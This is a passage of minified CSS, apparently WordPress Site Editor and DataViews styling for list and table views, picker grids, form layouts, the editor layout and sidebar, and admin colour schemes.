.dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__title-field{color:var(--wp-admin-theme-color)}.dataviews-view-list .dataviews-view-list__item{appearance:none;background:none;border:none;cursor:pointer;inset:0;padding:0;position:absolute;scroll-margin:8px 0;z-index:1}.dataviews-view-list .dataviews-view-list__item:focus-visible{outline:none}.dataviews-view-list .dataviews-view-list__item:focus-visible:before{border-radius:2px;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);content:"";inset:var(--wp-admin-border-width-focus);outline:2px solid #0000;position:absolute}.dataviews-view-list .dataviews-view-list__title-field{flex:1;line-height:24px;min-height:24px;overflow:hidden}.dataviews-view-list .dataviews-view-list__title-field:has(a,button){z-index:1}.dataviews-view-list .dataviews-view-list__media-wrapper{background-color:#fff;border-radius:4px;flex-shrink:0;height:52px;overflow:hidden;position:relative;width:52px}.dataviews-view-list .dataviews-view-list__media-wrapper img{height:100%;object-fit:cover;width:100%}.dataviews-view-list .dataviews-view-list__media-wrapper:after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;position:absolute;right:0;top:0;width:100%}.dataviews-view-list .dataviews-view-list__field-wrapper{flex-grow:1;min-height:52px}.dataviews-view-list .dataviews-view-list__fields{color:#757575;display:flex;flex-wrap:wrap;font-size:12px;gap:12px;row-gap:4px}.dataviews-view-list .dataviews-view-list__fields .dataviews-view-list__field:has(.dataviews-view-list__field-value:empty),.dataviews-view-list .dataviews-view-list__fields:empty{display:none}.dataviews-view-list .dataviews-view-list__fields .dataviews-view-list__field-value{align-items:center;display:flex;line-height:20px;min-height:24px}.dataviews-view-list+.dataviews-pagination{justify-content:space-between}.dataviews-view-list__group-header{color:#1e1e1e;font-size:15px;font-weight:500;margin:0 0 8px;padding:0 24px}.dataviews-view-table{border-collapse:collapse;border-color:inherit;color:#757575;margin-bottom:auto;position:relative;text-indent:0;width:100%}.dataviews-view-table th{color:#1e1e1e;font-size:13px;font-weight:400;text-align:right}.dataviews-view-table td,.dataviews-view-table th{padding:12px}.dataviews-view-table td.dataviews-view-table__actions-column,.dataviews-view-table th.dataviews-view-table__actions-column{text-align:left}.dataviews-view-table td.dataviews-view-table__actions-column--sticky,.dataviews-view-table th.dataviews-view-table__actions-column--sticky{background-color:#fff;left:0;position:sticky}.dataviews-view-table td.dataviews-view-table__actions-column--stuck:after,.dataviews-view-table th.dataviews-view-table__actions-column--stuck:after{background-color:#f0f0f0;bottom:0;content:"";display:block;position:absolute;right:0;top:0;width:1px}.dataviews-view-table td.dataviews-view-table__checkbox-column,.dataviews-view-table th.dataviews-view-table__checkbox-column{padding-left:0}.dataviews-view-table td.dataviews-view-table__checkbox-column .dataviews-view-table__cell-content-wrapper,.dataviews-view-table th.dataviews-view-table__checkbox-column .dataviews-view-table__cell-content-wrapper{max-width:auto;min-width:auto}.dataviews-view-table tr{border-top:1px solid #f0f0f0}.dataviews-view-table tr .dataviews-view-table-header-button{gap:4px}.dataviews-view-table tr td:first-child,.dataviews-view-table tr th:first-child{padding-right:48px}.dataviews-view-table tr td:first-child .dataviews-view-table-header-button,.dataviews-view-table tr th:first-child .dataviews-view-table-header-button{margin-right:-8px}.dataviews-view-table tr td:last-child,.dataviews-view-table tr th:last-child{padding-left:48px}.dataviews-view-table tr:last-child{border-bottom:0}.dataviews-view-table tr.is-hovered,.dataviews-view-table tr.is-hovered .dataviews-view-table__actions-column--sticky{background-color:#f8f8f8}.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input{opacity:0}.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:checked,.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:focus,.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:indeterminate{opacity:1}.dataviews-view-table tr .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){opacity:0}.dataviews-view-table tr.is-hovered .components-checkbox-control__input,.dataviews-view-table tr.is-hovered .dataviews-item-actions .components-button:not(.dataviews-all-actions-button),.dataviews-view-table tr:focus-within .components-checkbox-control__input,.dataviews-view-table tr:focus-within .dataviews-item-actions .components-button:not(.dataviews-all-actions-button),.dataviews-view-table tr:hover .components-checkbox-control__input,.dataviews-view-table tr:hover .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){opacity:1}@media (hover:none){.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input,.dataviews-view-table tr .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){opacity:1}}.dataviews-view-table tr.is-selected{background-color:rgba(var(--wp-admin-theme-color--rgb),.04);color:#757575}.dataviews-view-table tr.is-selected,.dataviews-view-table tr.is-selected+tr{border-top:1px solid rgba(var(--wp-admin-theme-color--rgb),.12)}.dataviews-view-table tr.is-selected:hover{background-color:rgba(var(--wp-admin-theme-color--rgb),.08)}.dataviews-view-table tr.is-selected .dataviews-view-table__actions-column--sticky{background-color:color-mix(in srgb,rgb(var(--wp-admin-theme-color--rgb)) 4%,#fff)}.dataviews-view-table tr.is-selected:hover .dataviews-view-table__actions-column--sticky{background-color:color-mix(in srgb,rgb(var(--wp-admin-theme-color--rgb)) 8%,#fff)}.dataviews-view-table thead{inset-block-start:0;position:sticky;z-index:1}.dataviews-view-table thead tr{border:0}.dataviews-view-table thead tr .components-checkbox-control__input.components-checkbox-control__input{opacity:1}.dataviews-view-table thead th{background-color:#fff;font-size:11px;font-weight:500;padding-bottom:8px;padding-right:12px;padding-top:8px;text-transform:uppercase}.dataviews-view-table thead th:has(.dataviews-view-table-header-button):not(:first-child){padding-right:4px}.dataviews-view-table tbody td{vertical-align:top}.dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper{align-items:center;display:flex;min-height:32px;white-space:nowrap}.dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper.dataviews-view-table__cell-align-end{justify-content:flex-end}.dataviews-view-table tbody .dataviews-view-table__cell-content-wrapper.dataviews-view-table__cell-align-center{justify-content:center}.dataviews-view-table tbody .components-v-stack>.dataviews-view-table__cell-content-wrapper:not(:first-child){min-height:0}.dataviews-view-table .dataviews-view-table-header-button{font-size:11px;font-weight:500;padding:4px 8px;text-transform:uppercase}.dataviews-view-table .dataviews-view-table-header-button:not(:hover){color:#1e1e1e}.dataviews-view-table .dataviews-view-table-header-button span{speak:none}.dataviews-view-table .dataviews-view-table-header-button span:empty{display:none}.dataviews-view-table .dataviews-view-table-header{padding-right:4px}.dataviews-view-table .dataviews-view-table__actions-column{white-space:nowrap;width:auto}.dataviews-view-table:has(tr.is-selected) .components-checkbox-control__input{opacity:1}.dataviews-view-table.has-compact-density thead th:has(.dataviews-view-table-header-button):not(:first-child){padding-right:0}.dataviews-view-table.has-compact-density td,.dataviews-view-table.has-compact-density th{padding:4px 8px}.dataviews-view-table.has-comfortable-density td,.dataviews-view-table.has-comfortable-density th{padding:16px 12px}.dataviews-view-table.has-comfortable-density td.dataviews-view-table__checkbox-column,.dataviews-view-table.has-comfortable-density th.dataviews-view-table__checkbox-column,.dataviews-view-table.has-compact-density td.dataviews-view-table__checkbox-column,.dataviews-view-table.has-compact-density th.dataviews-view-table__checkbox-column{padding-left:0}@container (max-width: 430px){.dataviews-view-table tr td:first-child,.dataviews-view-table tr th:first-child{padding-right:24px}.dataviews-view-table tr td:last-child,.dataviews-view-table tr th:last-child{padding-left:24px}}.dataviews-view-table-selection-checkbox{--checkbox-input-size:24px}@media (min-width:600px){.dataviews-view-table-selection-checkbox{--checkbox-input-size:16px}}.dataviews-column-primary__media{background-color:#fff;border-radius:4px;flex-shrink:0;max-width:60px;overflow:hidden;position:relative}.dataviews-column-primary__media img{height:100%;object-fit:cover;width:100%}.dataviews-column-primary__media:after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;position:absolute;right:0;top:0;width:100%}.dataviews-view-table__cell-content-wrapper:not(.dataviews-column-primary__media),.dataviews-view-table__primary-column-content:not(.dataviews-column-primary__media){max-width:80ch;min-width:15ch}.dataviews-view-table__group-header-row .dataviews-view-table__group-header-cell{color:#1e1e1e;font-weight:500;padding:12px 48px}.dataviews-view-table col[class^=dataviews-view-table__col-]:not(.dataviews-view-table__col-primary){width:1%}.dataviews-view-picker-grid .dataviews-view-picker-grid__card{height:100%;justify-content:flex-start;position:relative}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-actions{padding:8px 0 4px}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-field{align-content:center;min-height:24px;overflow:hidden;text-align:start}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__title-field--clickable{width:fit-content}.dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-value{color:#1e1e1e}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__media:focus:after,.dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__media:after{background-color:rgba(var(--wp-admin-theme-color--rgb),.08)}.dataviews-view-picker-grid .dataviews-view-picker-grid__card.is-selected .dataviews-view-picker-grid__media:after{box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color)}.dataviews-view-picker-grid .dataviews-view-picker-grid__card .dataviews-view-picker-grid__media:focus:after{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.dataviews-view-picker-grid:focus-visible[aria-activedescendant]{outline:none}.dataviews-view-picker-grid:focus-visible [data-active-item=true]{outline:2px solid var(--wp-admin-theme-color)}.dataviews-view-picker-grid .dataviews-selection-checkbox{top:8px!important}.dataviews-view-picker-grid .dataviews-selection-checkbox input{pointer-events:none}.dataviews-view-picker-grid .dataviews-view-picker-grid__media{aspect-ratio:1/1;background-color:#fff;border-radius:4px;position:relative;width:100%}.dataviews-view-picker-grid .dataviews-view-picker-grid__media img{height:100%;object-fit:cover;width:100%}.dataviews-view-picker-grid .dataviews-view-picker-grid__media:after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;pointer-events:none;position:absolute;right:0;top:0;width:100%}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields{font-size:12px;line-height:16px;position:relative}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields:not(:empty){padding:0 0 12px}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field-value:not(:empty){line-height:20px;min-height:24px;padding-top:2px}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field{align-items:center;min-height:24px}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-name{color:#757575;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:35%}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field .dataviews-view-picker-grid__field-value{overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:65%}.dataviews-view-picker-grid .dataviews-view-picker-grid__fields .dataviews-view-picker-grid__field:not(:has(.dataviews-view-picker-grid__field-value:not(:empty))){display:none}.dataviews-view-picker-grid .dataviews-view-picker-grid__badge-fields:not(:empty){padding-bottom:12px}.dataviews-view-picker-grid__field-value:empty,.dataviews-view-picker-grid__field:empty{display:none}.dataviews-view-picker-grid__card .dataviews-selection-checkbox{position:absolute;right:8px;top:-9999em;z-index:1}@media (hover:none){.dataviews-view-picker-grid__card .dataviews-selection-checkbox{top:8px}}.dataviews-view-picker-grid__card.is-selected .dataviews-selection-checkbox,.dataviews-view-picker-grid__card:focus-within .dataviews-selection-checkbox,.dataviews-view-picker-grid__card:hover .dataviews-selection-checkbox{top:8px}.dataviews-view-picker-grid__media--clickable{cursor:pointer}.dataviews-view-picker-grid-group__header{color:#1e1e1e;font-size:15px;font-weight:500;margin:0 0 8px;padding:0 48px}.dataviews-controls__datetime{border:none;padding:0}.dataviews-controls__relative-date-number,.dataviews-controls__relative-date-unit{flex:1 1 50%}.dataviews-controls__date input[type=date]::-webkit-calendar-picker-indicator,.dataviews-controls__date input[type=date]::-webkit-inner-spin-button{-webkit-appearance:none;display:none}.dataviews-controls__date-preset{border:1px solid #ddd}.dataviews-controls__date-preset:active{background-color:#000}.dataforms-layouts-panel__field{align-items:flex-start!important;justify-content:flex-start!important;min-height:32px;width:100%}.dataforms-layouts-panel__field-label{align-items:center;display:flex;flex-shrink:0;hyphens:auto;line-height:20px;min-height:32px;width:38%}.dataforms-layouts-panel__field-label--label-position-side{align-self:center}.dataforms-layouts-panel__field-control{align-items:center;display:flex;flex-grow:1;min-height:32px}.dataforms-layouts-panel__field-control .components-button{max-width:100%;min-height:32px;text-align:right;text-wrap:balance;text-wrap:pretty;white-space:normal}.dataforms-layouts-panel__field-control.components-button.is-link[aria-disabled=true]{text-decoration:none}.dataforms-layouts-panel__field-control .components-dropdown{max-width:100%}.dataforms-layouts-panel__field-dropdown .components-popover__content{min-width:320px;padding:16px}.dataforms-layouts-panel__dropdown-header{margin-bottom:16px}.dataforms-layouts-panel__modal-footer{margin-top:16px}.components-popover.components-dropdown__content.dataforms-layouts-panel__field-dropdown{z-index:159990}.dataforms-layouts-regular__field{align-items:flex-start!important;justify-content:flex-start!important;min-height:32px;width:100%}.dataforms-layouts-regular__field-label{align-items:center;display:flex;flex-shrink:0;hyphens:auto;line-height:20px;min-height:32px;width:38%}.dataforms-layouts-regular__field-label--label-position-side{align-self:center}.dataforms-layouts-regular__field-control{align-items:center;display:flex;flex-grow:1;min-height:32px}.dataforms-layouts-card__field-header-label{font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:15px;font-weight:500;line-height:20px}.dataforms-layouts-card__field{width:100%}.dataforms-layouts-card__field-description{color:#757575;display:block;font-size:13px;margin-bottom:16px}.dataforms-layouts-card__field-summary{display:flex;flex-direction:row;gap:16px}.dataforms-layouts-row__field-control{width:100%}.dataforms-layouts__wrapper{font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;line-height:20px}.edit-site-layout{color:#ccc;display:flex;flex-direction:column;height:100%}.edit-site-layout,.edit-site-layout:not(.is-full-canvas) .editor-visual-editor{background:#1e1e1e}.edit-site-layout__content{display:flex;flex-grow:1;height:100%}.edit-site-layout__sidebar-region{flex-shrink:0;width:100vw;z-index:1}@media (min-width:782px){.edit-site-layout__sidebar-region{width:300px}}.edit-site-layout.is-full-canvas .edit-site-layout__sidebar-region{height:100vh;position:fixed!important;right:0;top:0}.edit-site-layout__sidebar-region .edit-site-layout__sidebar{display:flex;flex-direction:column;height:100%}.edit-site-layout__sidebar-region .resizable-editor__drag-handle{left:0}.edit-site-layout__main{display:flex;flex-direction:column;flex-grow:1;overflow:hidden}.edit-site-layout__mobile{display:flex;flex-direction:column;position:relative;width:100%;z-index:2}.edit-site-layout__mobile .edit-site-sidebar__screen-wrapper{padding:0}.edit-site-layout__mobile .edit-site-sidebar-navigation-screen__main{padding:0 12px}.edit-site-layout__canvas-container{flex-grow:1;overflow:visible;position:relative;z-index:2}.edit-site-layout__canvas-container.is-resizing:after{bottom:0;content:"";left:0;position:absolute;right:0;top:0;z-index:100}.edit-site-layout__canvas{align-items:center;bottom:0;display:flex;justify-content:center;position:absolute;right:0;top:0;width:100%}.edit-site-layout__canvas.is-right-aligned{justify-content:flex-end}.edit-site-layout__canvas .edit-site-resizable-frame__inner{color:#1e1e1e}@media (min-width:782px){.edit-site-layout__canvas{bottom:16px;top:16px;width:calc(100% - 16px)}.edit-site-layout__canvas .edit-site-resizable-frame__inner-content{box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003;overflow:hidden}}@media (min-width:782px) and (not (prefers-reduced-motion)){.edit-site-layout__canvas .edit-site-resizable-frame__inner-content{transition:border-radius,box-shadow .4s}}@media (min-width:782px){.edit-site-layout:not(.is-full-canvas) .edit-site-layout__canvas .edit-site-resizable-frame__inner-content{border-radius:8px}.edit-site-layout__canvas .edit-site-resizable-frame__inner-content:hover{box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005}}.edit-site-layout.is-full-canvas .edit-site-layout__canvas{bottom:0;top:0;width:100%}.edit-site-layout__canvas .interface-interface-skeleton,.edit-site-layout__mobile .interface-interface-skeleton,.edit-site-template-pages-preview .interface-interface-skeleton{min-height:100%!important;position:relative!important}.edit-site-template-pages-preview{height:100%}html.canvas-mode-edit-transition::view-transition-group(toggle){animation-delay:255ms}@media (prefers-reduced-motion){::view-transition-group(*),::view-transition-new(*),::view-transition-old(*){animation:none!important}}.edit-site-layout.is-full-canvas .edit-site-layout__sidebar-region .edit-site-layout__view-mode-toggle{display:none}.edit-site-layout__view-mode-toggle.components-button{view-transition-name:toggle;align-items:center;background:#1e1e1e;border-radius:0;color:#fff;display:flex;height:64px;justify-content:center;overflow:hidden;padding:0;position:relative;width:64px}.edit-site-layout__view-mode-toggle.components-button:active,.edit-site-layout__view-mode-toggle.components-button:hover{color:#fff}.edit-site-layout__view-mode-toggle.components-button:focus,.edit-site-layout__view-mode-toggle.components-button:focus-visible{box-shadow:0 0 0 3px #1e1e1e,0 0 0 6px var(--wp-admin-theme-color);outline:4px solid #0000;outline-offset:4px}.edit-site-layout__view-mode-toggle.components-button:before{border-radius:4px;bottom:9px;box-shadow:none;content:"";display:block;left:9px;position:absolute;right:17px;top:9px}@media not (prefers-reduced-motion){.edit-site-layout__view-mode-toggle.components-button:before{transition:box-shadow .1s ease}}.edit-site-layout__view-mode-toggle.components-button .edit-site-layout__view-mode-toggle-icon{align-items:center;display:flex;height:64px;justify-content:center;width:64px}.edit-site-layout__actions{background:#fff;bottom:auto;color:#1e1e1e;left:0;position:fixed!important;right:auto;top:-9999em;width:280px;z-index:100000}.edit-site-layout__actions:focus,.edit-site-layout__actions:focus-within{bottom:0;top:auto}.edit-site-layout__actions.is-entity-save-view-open:focus,.edit-site-layout__actions.is-entity-save-view-open:focus-within{top:0}@media (min-width:782px){.edit-site-layout__actions{border-right:1px solid #ddd}}.edit-site-layout__area{box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003;flex-grow:1;margin:0;overflow:hidden}@media (min-width:782px){.edit-site-layout__area{border-radius:8px;margin:16px 0 16px 16px}}.edit-site .components-editor-notices__snackbar{bottom:16px;left:0;padding-left:16px;padding-right:16px;position:fixed}.edit-site-save-hub{border-top:1px solid #2f2f2f;color:#949494;flex-shrink:0;margin:0;padding:16px}.edit-site-save-hub__button{color:inherit;justify-content:center;width:100%}.edit-site-save-hub__button[aria-disabled=true]{opacity:1}.edit-site-save-hub__button[aria-disabled=true]:hover{color:inherit}.edit-site-save-hub__button:not(.is-primary).is-busy,.edit-site-save-hub__button:not(.is-primary).is-busy[aria-disabled=true]:hover{color:#1e1e1e}@media (min-width:600px){.edit-site-save-panel__modal{width:600px}}.edit-site-sidebar__content{contain:content;flex-grow:1;overflow-x:hidden;overflow-y:auto}@keyframes local--slide-from-right{0%{opacity:0;transform:translateX(-50px)}to{opacity:1;transform:none}}@keyframes local--slide-from-left{0%{opacity:0;transform:translateX(50px)}to{opacity:1;transform:none}}.edit-site-sidebar__screen-wrapper{overflow-x:auto}.edit-site-sidebar__screen-wrapper::-webkit-scrollbar{height:12px;width:12px}.edit-site-sidebar__screen-wrapper::-webkit-scrollbar-track{background-color:initial}.edit-site-sidebar__screen-wrapper::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:initial;border:3px solid #0000;border-radius:8px}.edit-site-sidebar__screen-wrapper:focus-within::-webkit-scrollbar-thumb,.edit-site-sidebar__screen-wrapper:focus::-webkit-scrollbar-thumb,.edit-site-sidebar__screen-wrapper:hover::-webkit-scrollbar-thumb{background-color:#757575}.edit-site-sidebar__screen-wrapper{scrollbar-color:#0000 #0000;scrollbar-gutter:stable both-edges;scrollbar-width:thin}.edit-site-sidebar__screen-wrapper:focus,.edit-site-sidebar__screen-wrapper:focus-within,.edit-site-sidebar__screen-wrapper:hover{scrollbar-color:#757575 #0000}.edit-site-sidebar__screen-wrapper{will-change:transform}@media (hover:none){.edit-site-sidebar__screen-wrapper{scrollbar-color:#757575 #0000}}.edit-site-sidebar__screen-wrapper{animation-duration:.14s;animation-timing-function:ease-in-out;display:flex;flex-direction:column;height:100%;max-height:100%;padding:0 12px;scrollbar-gutter:stable;will-change:transform,opacity}@media (prefers-reduced-motion:reduce){.edit-site-sidebar__screen-wrapper{animation-duration:0s}}.edit-site-sidebar__screen-wrapper.slide-from-left{animation-name:local--slide-from-left}.edit-site-sidebar__screen-wrapper.slide-from-right{animation-name:local--slide-from-right}.edit-site-site-hub{align-items:center;display:flex;gap:8px;height:64px;justify-content:space-between;margin-left:12px}.edit-site-site-hub__actions{flex-shrink:0}.edit-site-site-hub__view-mode-toggle-container{flex-shrink:0;height:64px;width:64px}.edit-site-site-hub__view-mode-toggle-container.has-transparent-background .edit-site-layout__view-mode-toggle-icon{background:#0000}.edit-site-site-hub__title .components-button{color:#e0e0e0;display:block;flex-grow:1;font-size:15px;font-weight:500;margin-right:-4px;overflow:hidden;padding-left:16px;position:relative;text-decoration:none;text-overflow:ellipsis;white-space:nowrap}.edit-site-site-hub__title .components-button:active,.edit-site-site-hub__title .components-button:focus,.edit-site-site-hub__title .components-button:hover{color:#e0e0e0}.edit-site-site-hub__title .components-button:focus{box-shadow:none;outline:none}.edit-site-site-hub__title .components-button:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) #1e1e1e,0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color);outline:2px solid #0000;outline-offset:2px}.edit-site-site-hub__title .components-button:after{content:"↗";font-weight:400;left:0;opacity:0;position:absolute}@media not (prefers-reduced-motion){.edit-site-site-hub__title .components-button:after{transition:opacity .1s linear}}.edit-site-site-hub__title .components-button:active:after,.edit-site-site-hub__title .components-button:focus:after,.edit-site-site-hub__title .components-button:hover:after{opacity:1}.edit-site-site-hub_toggle-command-center{color:#e0e0e0}.edit-site-site-hub_toggle-command-center:active svg,.edit-site-site-hub_toggle-command-center:hover svg{fill:#f0f0f0}.edit-site-site-icon__icon{fill:currentColor;height:100%;width:100%}.edit-site-layout.is-full-canvas .edit-site-site-icon__icon{padding:12px}.edit-site-site-icon__image{aspect-ratio:1/1;background:#333;height:100%;object-fit:cover;width:100%}.edit-site-layout.is-full-canvas .edit-site-site-icon__image{border-radius:0}.edit-site-editor__view-mode-toggle button:focus{position:relative}.edit-site-editor__view-mode-toggle button:focus:before{bottom:0;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color),inset 0 0 0 calc(1px + var(--wp-admin-border-width-focus)) #fff;content:"";display:block;left:0;position:absolute;right:0;top:0;z-index:1}.edit-site-editor-canvas-container{background-color:var(--wp-editor-canvas-background);height:100%}.edit-site-editor-canvas-container iframe{display:block;height:100%;width:100%}.edit-site-layout.is-full-canvas .edit-site-editor-canvas-container{padding:24px 24px 0}.edit-site-editor-canvas-container__section{background:#fff;border-radius:8px;bottom:0;left:0;overflow:hidden;position:absolute;right:0;top:0}@media not (prefers-reduced-motion){.edit-site-editor-canvas-container__section{transition:all .3s}}.edit-site-editor-canvas-container__close-button{background:#fff;left:8px;position:absolute;top:8px;z-index:2}.edit-site-post-list__featured-image{height:100%;object-fit:cover;width:100%}.edit-site-post-list__featured-image-wrapper{border-radius:4px;height:100%;width:100%}.edit-site-post-list__featured-image-wrapper.is-layout-table .edit-site-post-list__featured-image-button,.edit-site-post-list__featured-image-wrapper.is-layout-table:not(:has(.edit-site-post-list__featured-image-button)){background-color:#f0f0f0;border-radius:4px;display:block;flex-grow:0!important;height:32px;overflow:hidden;position:relative;width:32px}.edit-site-post-list__featured-image-wrapper.is-layout-table .edit-site-post-list__featured-image-button:after,.edit-site-post-list__featured-image-wrapper.is-layout-table:not(:has(.edit-site-post-list__featured-image-button)):after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;position:absolute;right:0;top:0;width:100%}.edit-site-post-list__featured-image-button{background-color:unset;border:none;border-radius:4px;box-shadow:none;box-sizing:border-box;cursor:pointer;height:100%;overflow:hidden;padding:0;width:100%}.edit-site-post-list__featured-image-button:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.dataviews-view-grid__card.is-selected .edit-site-post-list__featured-image-button:after{background:rgba(var(--wp-admin-theme-color--rgb),.04);box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.edit-site-post-list__status-icon{height:24px;width:24px}.edit-site-post-list__status-icon svg{fill:currentColor;margin-right:-4px}.edit-site-resizable-frame__inner{position:relative}body:has(.edit-site-resizable-frame__inner.is-resizing){cursor:col-resize;user-select:none;-webkit-user-select:none}.edit-site-resizable-frame__inner.is-resizing:before{content:"";inset:0;position:absolute;z-index:1}.edit-site-resizable-frame__inner-content{inset:0;position:absolute;z-index:0}.edit-site-resizable-frame__handle{align-items:center;background-color:#75757566;border:0;border-radius:4px;cursor:col-resize;display:flex;height:64px;justify-content:flex-end;padding:0;position:absolute;top:calc(50% - 32px);width:4px;z-index:100}.edit-site-resizable-frame__handle:before{content:"";height:100%;position:absolute;right:100%;width:32px}.edit-site-resizable-frame__handle:after{content:"";height:100%;left:100%;position:absolute;width:32px}.edit-site-resizable-frame__handle:focus-visible{outline:2px solid #0000}.edit-site-resizable-frame__handle.is-resizing,.edit-site-resizable-frame__handle:focus,.edit-site-resizable-frame__handle:hover{background-color:var(--wp-admin-theme-color)}body.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media 